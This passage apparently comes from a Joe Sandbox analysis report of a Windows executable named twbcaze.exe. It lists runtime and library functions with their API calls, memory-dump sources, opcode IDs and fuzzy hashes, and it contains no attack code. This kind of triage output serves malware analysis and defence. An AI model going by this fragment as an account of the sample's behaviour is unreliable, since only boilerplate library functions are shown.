                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe$_free
                                          • String ID:
                                          • API String ID: 1303422935-0
                                          • Opcode ID: a1eef01c508509c2d1d122460e36017c013dda3dbbad62265d6f8bf9cdd3332f
                                          • Instruction ID: ac7b474d6fc98c5ebbd15da6fc75ba26e624e1edeebb7e1b3e46e77a32f7513f
                                          • Opcode Fuzzy Hash: a1eef01c508509c2d1d122460e36017c013dda3dbbad62265d6f8bf9cdd3332f
                                          • Instruction Fuzzy Hash: A671C232600605EFDB24DB6DD881AEA77E5EF88324B24052FF419D7391DB35ED908B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419A30 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00419A27,00410832,0040F868), ref: 00419A3E
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00419A4C
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00419A65
                                          • SetLastError.KERNEL32(00000000,00419A27,00410832,0040F868), ref: 00419AB7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 6a06a2c0d6f406ebb987339e11d665c664df3075b5b77685e23857f55972794a
                                          • Instruction ID: 4e72711cbe370da124ff9bcb7bb46fb07669d8c76fc0a1cb41bda04e99651783
                                          • Opcode Fuzzy Hash: 6a06a2c0d6f406ebb987339e11d665c664df3075b5b77685e23857f55972794a
                                          • Instruction Fuzzy Hash: 9F01F132309622AEE63427777CA59A72685EF017F8320023FF624402F1FF5A9C85918C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004132DA,0040E8B6,?,0041335B,00000004,00000000,0040E8B6), ref: 00413265
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,004132DA,0040E8B6,?,0041335B,00000004,00000000,0040E8B6), ref: 00413278
                                          • FreeLibrary.KERNEL32(00000000,?,?,004132DA,0040E8B6,?,0041335B,00000004,00000000,0040E8B6), ref: 0041329B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: a9eaecb74b0f1c2e7d6bb8d2b937668f8ff8d246e60fd466908c7f8b95f40234
                                          • Instruction ID: f13012d448e515364a5808451a099c057f3e7b5a6003aace8a925c6212398a92
                                          • Opcode Fuzzy Hash: a9eaecb74b0f1c2e7d6bb8d2b937668f8ff8d246e60fd466908c7f8b95f40234
                                          • Instruction Fuzzy Hash: 73F08230601229FBDB219F51ED0DBDE7B78EB4075AF540062F405B1160CB789F45DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E884 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 0040E88B
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040E896
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040E904
                                            • Part of subcall function 0040E78E: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0040E7A6
                                          • std::locale::_Setgloballocale.LIBCPMT ref: 0040E8B1
                                          • _Yarn.LIBCPMT ref: 0040E8C7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                          • String ID:
                                          • API String ID: 1088826258-0
                                          • Opcode ID: 37234ab1be28d23009987259d219c472b90e351d95d08a6dda3180b4a3dfe735
                                          • Instruction ID: 3400708e6865e95127ac1b37d7fe9301104f7edf9cafbb999d1d02ea23cf3430
                                          • Opcode Fuzzy Hash: 37234ab1be28d23009987259d219c472b90e351d95d08a6dda3180b4a3dfe735
                                          • Instruction Fuzzy Hash: 5A019AB5A002209BCB0AEB22E955A7C3B61FB84308B14047EE801673D1CB786E12CBCD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E3A8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 0041E3C0
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 0041E3D2
                                          • _free.LIBCMT ref: 0041E3E4
                                          • _free.LIBCMT ref: 0041E3F6
                                          • _free.LIBCMT ref: 0041E408
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5c83ae428773e25317788d744fd137d569673975ab9d6138c9deb8ca62736589
                                          • Instruction ID: 7b88bea65a0b1f43fc525d08b963a14049a3deac22f7c0dfed099887ad013867
                                          • Opcode Fuzzy Hash: 5c83ae428773e25317788d744fd137d569673975ab9d6138c9deb8ca62736589
                                          • Instruction Fuzzy Hash: 03F01236505244678620EB56E9C9C97B3D9AA00B107585C1BF858D7B51EB38FCD0469D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\Temp\twbcaze.exe
                                          • API String ID: 0-2465341801
                                          • Opcode ID: 161bc1fe453a24d4e5947874a840ecbe141d76b8deb3dfb50e9ae0383eeec891
                                          • Instruction ID: bf390cfbd20c0f17ea5b1c3e0e8d24ea52ca80336ca7805b394e653bf088e3d1
                                          • Opcode Fuzzy Hash: 161bc1fe453a24d4e5947874a840ecbe141d76b8deb3dfb50e9ae0383eeec891
                                          • Instruction Fuzzy Hash: D8418071A00218ABCB21DF99EC859EFBBF8EBC5710B15006BE404D7351EB749A81CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A71C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0041A622,?,?,00000000,00000000,00000000,?), ref: 0041A741
                                          • CatchIt.LIBVCRUNTIME ref: 0041A827
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CatchEncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 1435073870-2084237596
                                          • Opcode ID: afdf2972dbb9fa97222bd35efbdd43855ba8fda15f37328886d0e0c9617a3284
                                          • Instruction ID: 6a9cd9403bd27c86c1ea0c160311e29b31724f3b5871e5d2b4079279596d1eb7
                                          • Opcode Fuzzy Hash: afdf2972dbb9fa97222bd35efbdd43855ba8fda15f37328886d0e0c9617a3284
                                          • Instruction Fuzzy Hash: 02417871900109AFCF15EF98C981AEEBBB5BF48304F18805AF914A6251D339DEA1DB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407CF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00407D05
                                            • Part of subcall function 004041C0: std::_Lockit::_Lockit.LIBCPMT ref: 004041E4
                                            • Part of subcall function 004041C0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040420F
                                          • std::_Facet_Register.LIBCPMT ref: 00407D93
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00407DD1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                          • String ID: 1|@
                                          • API String ID: 459529453-800989663
                                          • Opcode ID: f968c5a2ceffd9f62f956be7acafea80e481a352b490c4cb58a6bad916e8be5d
                                          • Instruction ID: df1d7254de4c4737ab4cdce48f978ba56a96f436c95f912a99cc71e35d993b47
                                          • Opcode Fuzzy Hash: f968c5a2ceffd9f62f956be7acafea80e481a352b490c4cb58a6bad916e8be5d
                                          • Instruction Fuzzy Hash: FD21D9B4D0420ADBCB04EFA5D5859AEBBF0AF04314F10457AE855B7391E774AA84CF8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0042484E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(00000000), ref: 004248A4
                                          • GetLastError.KERNEL32(?,00424931,?,0042FC98,0000000C,0042482E,?,?,?), ref: 004248AE
                                          • __dosmaperr.LIBCMT ref: 004248D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID: 8U
                                          • API String ID: 2583163307-1560779159
                                          • Opcode ID: b695ac448ec502b824e6d452526773643c5b8ea28f5126ec84344795acf40a58
                                          • Instruction ID: 2872174efd4d47e11b79a3ee67353118296fcb7ddf3ef0f6c6e2eb77d8ceda66
                                          • Opcode Fuzzy Hash: b695ac448ec502b824e6d452526773643c5b8ea28f5126ec84344795acf40a58
                                          • Instruction Fuzzy Hash: DF0129367141B007C67472B5B805B6E6B89CBC1B3CFA9026BF904972D2DA3C9881815D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E18B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          • AcquireSRWLockExclusive.KERNEL32(00432638,?,?,00402B1E,?,?,00402A88,?,004028C7), ref: 0040E195
                                          • ReleaseSRWLockExclusive.KERNEL32(00432638,?,?,00402B1E,?,?,00402A88,?,004028C7), ref: 0040E1C8
                                          • WakeAllConditionVariable.KERNEL32(00432634,?,?,00402B1E,?,?,00402A88,?,004028C7), ref: 0040E1D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                          • String ID: 8&C
                                          • API String ID: 1466638765-4180868660
                                          • Opcode ID: bb326b3d1a6057f6d4eda2fdb55b1c08876ac596fafac99671c5b540344f3fe5
                                          • Instruction ID: 63f9b1e205a4cf5fe4a8a0715ad09473f89d27546d428ca09e51556197a17499
                                          • Opcode Fuzzy Hash: bb326b3d1a6057f6d4eda2fdb55b1c08876ac596fafac99671c5b540344f3fe5
                                          • Instruction Fuzzy Hash: BBF039B4602210DFC318EF58F989999B7A8EB0D310B00147AFA0583330DBB46842CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A01E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: b1ffaf3be143962601bfd751bcf30ee1173fce86672cfef3168e1e718e814c89
                                          • Instruction ID: 05ac9061583e724ffec2fa218e0b3ff0f87b3e47112c77b43e326704fcf76a3e
                                          • Opcode Fuzzy Hash: b1ffaf3be143962601bfd751bcf30ee1173fce86672cfef3168e1e718e814c89
                                          • Instruction Fuzzy Hash: E851F172602202AFDB289F15D941BEA77B5EF04314F14442FE84187391E739ECE1CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041AE68 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                          • _free.LIBCMT ref: 0041AECA
                                          • _free.LIBCMT ref: 0041AF00
                                          • SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 465fb4a1ee4c9454c80ef43f4a0eb4c141932a626125280fca3e2634ba948ceb
                                          • Instruction ID: 04fe7bfcbbf35f31ac0b3b3c8fdcf247abc73e494e7426076554552e017b386c
                                          • Opcode Fuzzy Hash: 465fb4a1ee4c9454c80ef43f4a0eb4c141932a626125280fca3e2634ba948ceb
                                          • Instruction Fuzzy Hash: 45112C713463012BC61176769C85FEB211ADBC03F9B25113BF138862E1EF2D8CE1415E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041AFBF Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,0041531C,0041ACE4,?,?,0040E0E2,?,?,00401942,00000000,?,00401851), ref: 0041AFC4
                                          • _free.LIBCMT ref: 0041B021
                                          • _free.LIBCMT ref: 0041B057
                                          • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,?,0041531C,0041ACE4,?,?,0040E0E2,?,?,00401942,00000000), ref: 0041B062
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: c9f735076e89557456e168ab1ef37200c4df73db6735b96dd666e663e5cfb4e8
                                          • Instruction ID: 47653adca3cb3e4d72ad73b2514f88ae9e3e3fde6527a25f988a1d2191d663d1
                                          • Opcode Fuzzy Hash: c9f735076e89557456e168ab1ef37200c4df73db6735b96dd666e663e5cfb4e8
                                          • Instruction Fuzzy Hash: 7511E9723051002BC6113A769CC5EA72659DBC57F9725113BF138862E2EF2D8CD141AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00424736 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • WriteConsoleW.KERNEL32 ref: 0042474D
                                          • GetLastError.KERNEL32(?,00424191,?,00000001,?,00000001,?,00422DD0,?,?,00000001,?,00000001,?,00422864,0041D2F5), ref: 00424759
                                            • Part of subcall function 004247AA: CloseHandle.KERNEL32(FFFFFFFE), ref: 004247BA
                                          • ___initconout.LIBCMT ref: 00424769
                                            • Part of subcall function 0042478B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 0042479E
                                          • WriteConsoleW.KERNEL32 ref: 0042477E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 350c2ee933c2393c7b9754eea8cbbf259ca380d9cec6957e6089de5b3cb8e804
                                          • Instruction ID: 382caa9a29c65e89878ef9e0e4a6c080ff036c71a35ae6ff5ac9d19cfbebcadd
                                          • Opcode Fuzzy Hash: 350c2ee933c2393c7b9754eea8cbbf259ca380d9cec6957e6089de5b3cb8e804
                                          • Instruction Fuzzy Hash: 32F03736201135BBCF221FD6EC089CA7F25FF89770B508122FE1985130D7718961EB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412FD9 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00412FE2
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 00412FF5
                                          • _free.LIBCMT ref: 00413006
                                          • _free.LIBCMT ref: 00413017
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: e9e5f2e41f3733c2eff641b063f42574cbd324a24f89577f96bb0eb8152791dc
                                          • Instruction ID: 5f81c87fe3d558299dbab55690507bf2b9849b575d915bdff1144723836fa9f9
                                          • Opcode Fuzzy Hash: e9e5f2e41f3733c2eff641b063f42574cbd324a24f89577f96bb0eb8152791dc
                                          • Instruction Fuzzy Hash: 31E04670901120AB8602AF12BD45489BF61EB14B02704E42BF84807332EB3A47A39FCE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041EEDC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,004137E7,?,?,?,00000055,?,-00000050,?,?,?), ref: 0041EF9D
                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,004137E7,?,?,?,00000055,?,-00000050,?,?), ref: 0041EFC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CodePageValid
                                          • String ID: utf8
                                          • API String ID: 943130320-905460609
                                          • Opcode ID: 2588997caceb56cb08feb0f826b7642f8072fed7b1e7b42a654ab6406482ac7e
                                          • Instruction ID: 648f6a098cce61d627996268e321a9ffc18456b901debb5a689669c47e2500d2
                                          • Opcode Fuzzy Hash: 2588997caceb56cb08feb0f826b7642f8072fed7b1e7b42a654ab6406482ac7e
                                          • Instruction Fuzzy Hash: 8651D435640201B6E725AB328C46FE777A8EF48704F14047BFD0997282F779AAC7866D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040EEA8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv
                                          • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                          • API String ID: 3732870572-1956417402
                                          • Opcode ID: 60ce88543888415d76db726476f9516c1b217617e5ae6a872a2eac9c1540e8e2
                                          • Instruction ID: f914e1aa9013a1433de104594954d8dae758147185d19b661e85066580ed57eb
                                          • Opcode Fuzzy Hash: 60ce88543888415d76db726476f9516c1b217617e5ae6a872a2eac9c1540e8e2
                                          • Instruction Fuzzy Hash: D151E470A04249ABDF258E7E84817BFBBA9AF45700F14447FE480B73C2C2BC89468B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419F87 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0041A1FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ___except_validate_context_record
                                          • String ID: csm$csm
                                          • API String ID: 3493665558-3733052814
                                          • Opcode ID: e1e810f7eec32865bd94398c0121fd3c4ff266d68d8713e2df609acbe281d2fe
                                          • Instruction ID: 1494fe649e5353dc08c68101fd2e464552a491e1779c1e50f007e242b881d39f
                                          • Opcode Fuzzy Hash: e1e810f7eec32865bd94398c0121fd3c4ff266d68d8713e2df609acbe281d2fe
                                          • Instruction Fuzzy Hash: 34318D325012189BCF269F91D8449EA7B66FF4A315B18419BF85449321D33BDCF2DB8A
